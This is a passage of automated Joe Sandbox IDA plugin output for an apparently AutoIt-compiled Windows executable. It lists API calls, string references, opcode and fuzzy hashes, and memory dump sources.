                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004A222C
                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 004A2255
                                                              Strings
                                                              Similarity
                                                              • API ID: Internet$OpenOption
                                                              • String ID: <local>
                                                              • API String ID: 942729171-4266983199
                                                              APIs
                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00433C14,004F52F8,?,?,?), ref: 0044096E
                                                                • Part of subcall function 00437BCC: _memmove.LIBCMT ref: 00437C06
                                                              • _wcscat.LIBCMT ref: 00474CB7
                                                              Strings
                                                              Similarity
                                                              • API ID: FullNamePath_memmove_wcscat
                                                              • String ID: SO
                                                              • API String ID: 257928180-2479146506
                                                              APIs
                                                                • Part of subcall function 00437DE1: _memmove.LIBCMT ref: 00437E22
                                                                • Part of subcall function 0048AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0048AABC
                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00488E73
                                                              Strings
                                                              Similarity
                                                              • API ID: ClassMessageNameSend_memmove
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 372448540-1403004172
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: __fread_nolock_memmove
                                                              • String ID: EA06
                                                              • API String ID: 1988441806-3962188686
                                                              APIs
                                                                • Part of subcall function 00437DE1: _memmove.LIBCMT ref: 00437E22
                                                                • Part of subcall function 0048AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0048AABC
                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00488D6B
                                                              Strings
                                                              Similarity
                                                              • API ID: ClassMessageNameSend_memmove
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 372448540-1403004172
                                                              APIs
                                                                • Part of subcall function 00437DE1: _memmove.LIBCMT ref: 00437E22
                                                                • Part of subcall function 0048AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0048AABC
                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 00488DEE
                                                              Strings
                                                              Similarity
                                                              • API ID: ClassMessageNameSend_memmove
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 372448540-1403004172
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 0048C534
                                                                • Part of subcall function 0048C816: _memmove.LIBCMT ref: 0048C860
                                                                • Part of subcall function 0048C816: VariantInit.OLEAUT32(00000000), ref: 0048C882
                                                                • Part of subcall function 0048C816: VariantCopy.OLEAUT32(00000000,?), ref: 0048C88C
                                                              • VariantClear.OLEAUT32(?), ref: 0048C556
                                                              Strings
                                                              Similarity
                                                              • API ID: Variant$Init$ClearCopy_memmove
                                                              • String ID: d}N
                                                              • API String ID: 2932060187-3144339906
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: ClassName_wcscmp
                                                              • String ID: #32770
                                                              • API String ID: 2292705959-463685578
                                                              APIs
                                                                • Part of subcall function 0046B314: _memset.LIBCMT ref: 0046B321
                                                                • Part of subcall function 00450940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0046B2F0,?,?,?,0043100A), ref: 00450945
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,0043100A), ref: 0046B2F4
                                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0043100A), ref: 0046B303
                                                              Strings
                                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0046B2FE
                                                              Similarity
                                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                              • API String ID: 3158253471-631824599
                                                              APIs
                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00487C82
                                                                • Part of subcall function 00453358: _doexit.LIBCMT ref: 00453362
                                                              Strings
                                                              Similarity
                                                              • API ID: Message_doexit
                                                              • String ID: AutoIt$Error allocating memory.
                                                              • API String ID: 1993061046-4017498283
                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(?), ref: 00471775
                                                                • Part of subcall function 004ABFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0047195E,?), ref: 004ABFFE
                                                                • Part of subcall function 004ABFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 004AC010
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0047196D
                                                              Strings
                                                              Similarity
                                                              • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                              • String ID: WIN_XPe
                                                              • API String ID: 582185067-3257408948
                                                              APIs
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004B596E
                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 004B5981
                                                                • Part of subcall function 00495244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004952BC
                                                              Strings
                                                              Similarity
                                                              • API ID: FindMessagePostSleepWindow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 529655941-2988720461
                                                              • Opcode ID: 403bb92a008d0a202e41cbc142a891abf4ab4a50418faeb9e98c317189773568
                                                              • Instruction ID: 80dad7ed3e4a9ae142dda815327e331912c758405f682364ca3aa8149d900a42
                                                              • Opcode Fuzzy Hash: 403bb92a008d0a202e41cbc142a891abf4ab4a50418faeb9e98c317189773568
                                                              • Instruction Fuzzy Hash: D3D0A931380300B7EA64AB309C0BFA22A10AB00B00F10093AB20DAA0D0C8E49800CB68
                                                              APIs
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004B59AE
                                                              • PostMessageW.USER32(00000000), ref: 004B59B5
                                                                • Part of subcall function 00495244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004952BC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: FindMessagePostSleepWindow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 529655941-2988720461
                                                              • Opcode ID: 62c59be4e5d2e95fd8567e3bc2fb720b1f2178e56eda63641b668ebc025373e7
                                                              • Instruction ID: c18fb7a50edf298c607add2f3e5e688371f20f9b6fa14ba6b49af372ffc852ae
                                                              • Opcode Fuzzy Hash: 62c59be4e5d2e95fd8567e3bc2fb720b1f2178e56eda63641b668ebc025373e7
                                                              • Instruction Fuzzy Hash: 43D0C9317807117BEA64AB759C0BF966A14AB14B55F10093AB649AA1D1C9E4A804CB6C